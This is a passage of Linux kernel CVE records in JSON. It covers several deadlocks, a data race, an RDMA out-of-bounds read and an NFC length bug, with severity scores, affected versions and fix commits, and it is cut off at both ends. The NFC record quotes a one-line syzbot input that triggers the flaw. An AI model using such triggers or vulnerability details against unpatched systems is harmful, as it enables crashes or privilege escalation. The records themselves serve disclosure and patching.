\tsnd_pcm_period_elapsed() in\n\tupdate_pcm_pointers() in\n\tprocess_ctx_payloads() in\n\tprocess_rx_packets() of amdtp-stream.c\n\n? tasklet_unlock_spin_wait\n \u003c/NMI\u003e\n \u003cTASK\u003e\nohci_flush_iso_completions firewire_ohci\namdtp_domain_stream_pcm_pointer snd_firewire_lib\nsnd_pcm_update_hw_ptr0 snd_pcm\nsnd_pcm_status64 snd_pcm\n\n? native_queued_spin_lock_slowpath\n \u003c/NMI\u003e\n \u003cIRQ\u003e\n_raw_spin_lock_irqsave\nsnd_pcm_period_elapsed snd_pcm\nprocess_rx_packets snd_firewire_lib\nirq_target_callback snd_firewire_lib\nhandle_it_packet firewire_ohci\ncontext_tasklet firewire_ohci\n\nRestore the process context work queue to prevent deadlock\nAB/BA deadlock competition for ALSA substream lock of\nsnd_pcm_stream_lock_irq() in snd_pcm_status64()\nand snd_pcm_stream_lock_irqsave() in snd_pcm_period_elapsed().\n\nrevert commit 7ba5ca32fe6e (\"ALSA: firewire-lib: operate for period\nelapse event in process context\")\n\nReplace inline description to prevent future deadlock."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:41.585Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7c07220cf634002f93a87ca2252a32766850f2d1"
},
{
"url": "https://git.kernel.org/stable/c/b239a37d68e8bc59f9516444da222841e3b13ba9"
},
{
"url": "https://git.kernel.org/stable/c/f5043e69aeb2786f32e84132817a007a6430aa7d"
},
{
"url": "https://git.kernel.org/stable/c/36c255db5a25edd42d1aca48e38b8e95ee5fd9ef"
},
{
"url": "https://git.kernel.org/stable/c/3dab73ab925a51ab05543b491bf17463a48ca323"
}
],
"title": "Revert \"ALSA: firewire-lib: operate for period elapse event in process context\"",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42274",
"datePublished": "2024-08-17T08:54:28.169Z",
"dateReserved": "2024-07-30T07:40:12.260Z",
"dateUpdated": "2025-05-04T09:25:41.585Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-28748 (GCVE-0-2022-28748)
Vulnerability from cvelistv5
DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2022-2964. Reason: This candidate is a reservation duplicate of CVE-2022-2964. Notes: All CVE users should reference CVE-2022-2964 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2022-11-10T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"rejectedReasons": [
{
"lang": "en",
"value": "DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2022-2964. Reason: This candidate is a reservation duplicate of CVE-2022-2964. Notes: All CVE users should reference CVE-2022-2964 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-28748",
"dateRejected": "2022-11-10T00:00:00",
"dateReserved": "2022-04-06T00:00:00",
"dateUpdated": "2022-11-10T00:00:00",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.0"
}
CVE-2023-2176 (GCVE-0-2023-2176)
Vulnerability from cvelistv5
Published
2023-04-20 00:00
Modified
2025-05-05 16:01
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:12:20.598Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.spinics.net/lists/linux-rdma/msg114749.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230609-0005/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-2176",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-23T13:28:34.519474Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-05T16:01:21.860Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Linux 6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-06-09T00:00:00.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://www.spinics.net/lists/linux-rdma/msg114749.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230609-0005/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-2176",
"datePublished": "2023-04-20T00:00:00.000Z",
"dateReserved": "2023-04-19T00:00:00.000Z",
"dateUpdated": "2025-05-05T16:01:21.860Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43863 (GCVE-0-2024-43863)
Vulnerability from cvelistv5
Published
2024-08-20 23:45
Modified
2025-06-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/vmwgfx: Fix a deadlock in dma buf fence polling
Introduce a version of the fence ops that on release doesn't remove
the fence from the pending list, and thus doesn't require a lock to
fix poll->fence wait->fence unref deadlocks.
vmwgfx overwrites the wait callback to iterate over the list of all
fences and update their status, to do that it holds a lock to prevent
the list modifcations from other threads. The fence destroy callback
both deletes the fence and removes it from the list of pending
fences, for which it holds a lock.
dma buf polling cb unrefs a fence after it's been signaled: so the poll
calls the wait, which signals the fences, which are being destroyed.
The destruction tries to acquire the lock on the pending fences list
which it can never get because it's held by the wait from which it
was called.
Old bug, but not a lot of userspace apps were using dma-buf polling
interfaces. Fix those, in particular this fixes KDE stalls/deadlock.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2298e804e96eb3635c39519c8287befd92460303 Version: 2298e804e96eb3635c39519c8287befd92460303 Version: 2298e804e96eb3635c39519c8287befd92460303 Version: 2298e804e96eb3635c39519c8287befd92460303 Version: 2298e804e96eb3635c39519c8287befd92460303 Version: 2298e804e96eb3635c39519c8287befd92460303 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43863",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:06:45.941347Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:19.603Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/vmwgfx/vmwgfx_fence.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9908dc0d2ef0e4aec8a242c098455729c0e2f017",
"status": "affected",
"version": "2298e804e96eb3635c39519c8287befd92460303",
"versionType": "git"
},
{
"lessThan": "9e20d028d8d1deb1e7fed18f22ffc01669cf3237",
"status": "affected",
"version": "2298e804e96eb3635c39519c8287befd92460303",
"versionType": "git"
},
{
"lessThan": "3b933b16c996af8adb6bc1b5748a63dfb41a82bc",
"status": "affected",
"version": "2298e804e96eb3635c39519c8287befd92460303",
"versionType": "git"
},
{
"lessThan": "a8943969f9ead2fd3044fc826140a21622ef830e",
"status": "affected",
"version": "2298e804e96eb3635c39519c8287befd92460303",
"versionType": "git"
},
{
"lessThan": "c98ab18b9f315ff977c2c65d7c71298ef98be8e3",
"status": "affected",
"version": "2298e804e96eb3635c39519c8287befd92460303",
"versionType": "git"
},
{
"lessThan": "e58337100721f3cc0c7424a18730e4f39844934f",
"status": "affected",
"version": "2298e804e96eb3635c39519c8287befd92460303",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/vmwgfx/vmwgfx_fence.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.238",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.45",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.238",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.104",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.45",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.4",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Fix a deadlock in dma buf fence polling\n\nIntroduce a version of the fence ops that on release doesn\u0027t remove\nthe fence from the pending list, and thus doesn\u0027t require a lock to\nfix poll-\u003efence wait-\u003efence unref deadlocks.\n\nvmwgfx overwrites the wait callback to iterate over the list of all\nfences and update their status, to do that it holds a lock to prevent\nthe list modifcations from other threads. The fence destroy callback\nboth deletes the fence and removes it from the list of pending\nfences, for which it holds a lock.\n\ndma buf polling cb unrefs a fence after it\u0027s been signaled: so the poll\ncalls the wait, which signals the fences, which are being destroyed.\nThe destruction tries to acquire the lock on the pending fences list\nwhich it can never get because it\u0027s held by the wait from which it\nwas called.\n\nOld bug, but not a lot of userspace apps were using dma-buf polling\ninterfaces. Fix those, in particular this fixes KDE stalls/deadlock."
}
],
"providerMetadata": {
"dateUpdated": "2025-06-04T12:57:17.071Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9908dc0d2ef0e4aec8a242c098455729c0e2f017"
},
{
"url": "https://git.kernel.org/stable/c/9e20d028d8d1deb1e7fed18f22ffc01669cf3237"
},
{
"url": "https://git.kernel.org/stable/c/3b933b16c996af8adb6bc1b5748a63dfb41a82bc"
},
{
"url": "https://git.kernel.org/stable/c/a8943969f9ead2fd3044fc826140a21622ef830e"
},
{
"url": "https://git.kernel.org/stable/c/c98ab18b9f315ff977c2c65d7c71298ef98be8e3"
},
{
"url": "https://git.kernel.org/stable/c/e58337100721f3cc0c7424a18730e4f39844934f"
}
],
"title": "drm/vmwgfx: Fix a deadlock in dma buf fence polling",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43863",
"datePublished": "2024-08-20T23:45:27.756Z",
"dateReserved": "2024-08-17T09:11:59.279Z",
"dateUpdated": "2025-06-04T12:57:17.071Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26631 (GCVE-0-2024-26631)
Vulnerability from cvelistv5
Published
2024-03-18 10:07
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: fix data-race in ipv6_mc_down / mld_ifc_work
idev->mc_ifc_count can be written over without proper locking.
Originally found by syzbot [1], fix this issue by encapsulating calls
to mld_ifc_stop_work() (and mld_gq_stop_work() for good measure) with
mutex_lock() and mutex_unlock() accordingly as these functions
should only be called with mc_lock per their declarations.
[1]
BUG: KCSAN: data-race in ipv6_mc_down / mld_ifc_work
write to 0xffff88813a80c832 of 1 bytes by task 3771 on cpu 0:
mld_ifc_stop_work net/ipv6/mcast.c:1080 [inline]
ipv6_mc_down+0x10a/0x280 net/ipv6/mcast.c:2725
addrconf_ifdown+0xe32/0xf10 net/ipv6/addrconf.c:3949
addrconf_notify+0x310/0x980
notifier_call_chain kernel/notifier.c:93 [inline]
raw_notifier_call_chain+0x6b/0x1c0 kernel/notifier.c:461
__dev_notify_flags+0x205/0x3d0
dev_change_flags+0xab/0xd0 net/core/dev.c:8685
do_setlink+0x9f6/0x2430 net/core/rtnetlink.c:2916
rtnl_group_changelink net/core/rtnetlink.c:3458 [inline]
__rtnl_newlink net/core/rtnetlink.c:3717 [inline]
rtnl_newlink+0xbb3/0x1670 net/core/rtnetlink.c:3754
rtnetlink_rcv_msg+0x807/0x8c0 net/core/rtnetlink.c:6558
netlink_rcv_skb+0x126/0x220 net/netlink/af_netlink.c:2545
rtnetlink_rcv+0x1c/0x20 net/core/rtnetlink.c:6576
netlink_unicast_kernel net/netlink/af_netlink.c:1342 [inline]
netlink_unicast+0x589/0x650 net/netlink/af_netlink.c:1368
netlink_sendmsg+0x66e/0x770 net/netlink/af_netlink.c:1910
...
write to 0xffff88813a80c832 of 1 bytes by task 22 on cpu 1:
mld_ifc_work+0x54c/0x7b0 net/ipv6/mcast.c:2653
process_one_work kernel/workqueue.c:2627 [inline]
process_scheduled_works+0x5b8/0xa30 kernel/workqueue.c:2700
worker_thread+0x525/0x730 kernel/workqueue.c:2781
...
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.693Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62b3387beef11738eb6ce667601a28fa089fa02c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/380540bb06bb1d1b12bdc947d1b8f56cda6b5663"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3cc283fd16fba72e2cefe3a6f48d7a36b0438900"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3bb5849675ae1d592929798a2b37ea450879c855"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e7ef287f07c74985f1bf2858bedc62bd9ebf155"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26631",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-27T14:55:41.665799Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-27T14:55:52.147Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/mcast.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "62b3387beef11738eb6ce667601a28fa089fa02c",
"status": "affected",
"version": "2d9a93b4902be6a5504b5941dd15e9cd776aadca",
"versionType": "git"
},
{
"lessThan": "380540bb06bb1d1b12bdc947d1b8f56cda6b5663",
"status": "affected",
"version": "2d9a93b4902be6a5504b5941dd15e9cd776aadca",
"versionType": "git"
},
{
"lessThan": "3cc283fd16fba72e2cefe3a6f48d7a36b0438900",
"status": "affected",
"version": "2d9a93b4902be6a5504b5941dd15e9cd776aadca",
"versionType": "git"
},
{
"lessThan": "3bb5849675ae1d592929798a2b37ea450879c855",
"status": "affected",
"version": "2d9a93b4902be6a5504b5941dd15e9cd776aadca",
"versionType": "git"
},
{
"lessThan": "2e7ef287f07c74985f1bf2858bedc62bd9ebf155",
"status": "affected",
"version": "2d9a93b4902be6a5504b5941dd15e9cd776aadca",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/mcast.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: mcast: fix data-race in ipv6_mc_down / mld_ifc_work\n\nidev-\u003emc_ifc_count can be written over without proper locking.\n\nOriginally found by syzbot [1], fix this issue by encapsulating calls\nto mld_ifc_stop_work() (and mld_gq_stop_work() for good measure) with\nmutex_lock() and mutex_unlock() accordingly as these functions\nshould only be called with mc_lock per their declarations.\n\n[1]\nBUG: KCSAN: data-race in ipv6_mc_down / mld_ifc_work\n\nwrite to 0xffff88813a80c832 of 1 bytes by task 3771 on cpu 0:\n mld_ifc_stop_work net/ipv6/mcast.c:1080 [inline]\n ipv6_mc_down+0x10a/0x280 net/ipv6/mcast.c:2725\n addrconf_ifdown+0xe32/0xf10 net/ipv6/addrconf.c:3949\n addrconf_notify+0x310/0x980\n notifier_call_chain kernel/notifier.c:93 [inline]\n raw_notifier_call_chain+0x6b/0x1c0 kernel/notifier.c:461\n __dev_notify_flags+0x205/0x3d0\n dev_change_flags+0xab/0xd0 net/core/dev.c:8685\n do_setlink+0x9f6/0x2430 net/core/rtnetlink.c:2916\n rtnl_group_changelink net/core/rtnetlink.c:3458 [inline]\n __rtnl_newlink net/core/rtnetlink.c:3717 [inline]\n rtnl_newlink+0xbb3/0x1670 net/core/rtnetlink.c:3754\n rtnetlink_rcv_msg+0x807/0x8c0 net/core/rtnetlink.c:6558\n netlink_rcv_skb+0x126/0x220 net/netlink/af_netlink.c:2545\n rtnetlink_rcv+0x1c/0x20 net/core/rtnetlink.c:6576\n netlink_unicast_kernel net/netlink/af_netlink.c:1342 [inline]\n netlink_unicast+0x589/0x650 net/netlink/af_netlink.c:1368\n netlink_sendmsg+0x66e/0x770 net/netlink/af_netlink.c:1910\n ...\n\nwrite to 0xffff88813a80c832 of 1 bytes by task 22 on cpu 1:\n mld_ifc_work+0x54c/0x7b0 net/ipv6/mcast.c:2653\n process_one_work kernel/workqueue.c:2627 [inline]\n process_scheduled_works+0x5b8/0xa30 kernel/workqueue.c:2700\n worker_thread+0x525/0x730 kernel/workqueue.c:2781\n ..."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:41.313Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/62b3387beef11738eb6ce667601a28fa089fa02c"
},
{
"url": "https://git.kernel.org/stable/c/380540bb06bb1d1b12bdc947d1b8f56cda6b5663"
},
{
"url": "https://git.kernel.org/stable/c/3cc283fd16fba72e2cefe3a6f48d7a36b0438900"
},
{
"url": "https://git.kernel.org/stable/c/3bb5849675ae1d592929798a2b37ea450879c855"
},
{
"url": "https://git.kernel.org/stable/c/2e7ef287f07c74985f1bf2858bedc62bd9ebf155"
}
],
"title": "ipv6: mcast: fix data-race in ipv6_mc_down / mld_ifc_work",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26631",
"datePublished": "2024-03-18T10:07:48.346Z",
"dateReserved": "2024-02-19T14:20:24.136Z",
"dateUpdated": "2025-05-04T08:52:41.313Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42130 (GCVE-0-2024-42130)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfc/nci: Add the inconsistency check between the input data length and count
write$nci(r0, &(0x7f0000000740)=ANY=[@ANYBLOB="610501"], 0xf)
Syzbot constructed a write() call with a data length of 3 bytes but a count value
of 15, which passed too little data to meet the basic requirements of the function
nci_rf_intf_activated_ntf_packet().
Therefore, increasing the comparison between data length and count value to avoid
problems caused by inconsistent data length and count.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.159Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f07bcd8bba803c9e6ad2048543185d6c56587a2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41f5e2840cd0629f049ce5ce2f8dd10a8299de42"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/056478b4321b36ca33567089d39ac992f6c9c37a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/22a72c1c10f43ca645a98725e0faff34592f4d08"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/068648aab72c9ba7b0597354ef4d81ffaac7b979"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42130",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:16:28.692005Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:36.616Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nfc/virtual_ncidev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f07bcd8bba803c9e6ad2048543185d6c56587a2f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "41f5e2840cd0629f049ce5ce2f8dd10a8299de42",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "056478b4321b36ca33567089d39ac992f6c9c37a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "22a72c1c10f43ca645a98725e0faff34592f4d08",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "068648aab72c9ba7b0597354ef4d81ffaac7b979",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nfc/virtual_ncidev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
